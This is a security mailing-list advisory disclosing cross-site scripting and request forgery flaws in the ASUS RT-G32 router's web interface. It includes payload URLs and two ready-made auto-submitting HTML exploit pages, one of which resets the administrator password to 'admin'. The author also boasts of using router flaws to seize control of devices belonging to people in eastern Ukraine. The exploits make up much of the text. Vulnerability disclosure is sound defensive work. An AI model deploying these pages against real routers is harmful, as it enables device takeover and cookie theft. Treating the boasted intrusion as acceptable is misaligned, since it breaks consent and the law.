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  1. Hello list! There are Cross-Site Scripting and Cross-Site Request Forgery vulnerabilities in ASUS Wireless Router RT-G32. ------------------------- Affected products: ------------------------- Vulnerable is the next model: ASUS RT-G32 with different versions of firmware. I checked in ASUS RT-G32 with firmware versions 2.0.2.6 and 2.0.3.2. ---------- Details: ---------- Cross-Site Scripting (WASC-08): http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27 http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27 http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27 http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27 These vulnerabilities work as via GET, as via POST (work even without authorization). ASUS RT-G32 XSS-1.html <html> <head> <title>ASUS RT-G32 XSS exploit (C) 2015 MustLive</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/start_apply.htm" method="post"> <input type="hidden" name="next_page" value="'+alert(document.cookie)+'"> <input type="hidden" name="group_id" value="'+alert(document.cookie)+'"> <input type="hidden" name="action_script" value="'+alert(document.cookie)+'"> <input type="hidden" name="flag" value="'+alert(document.cookie)+'"> </form> </body> </html> Cross-Site Request Forgery (WASC-09): CSRF vulnerability allows to change different settings, including admin's password. As I showed in this exploit (post-auth). ASUS RT-G32 CSRF-1.html <html> <head> <title>ASUS RT-G32 CSRF exploit (C) 2015 MustLive</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/start_apply.htm" method="post"> <input type="hidden" name="http_passwd" value="admin"> <input type="hidden" name="http_passwd2" value="admin"> <input type="hidden" name="v_password2" value="admin"> <input type="hidden" name="action_mode" value="+Apply+"> </form> </body> </html> I found this and other routers since summer to take control over terrorists in Crimea, Donetsk & Lugansks regions of Ukraine. Read about it in the list (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-February/009077.html) and in many my interviews (http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html). I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/7644/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua Source
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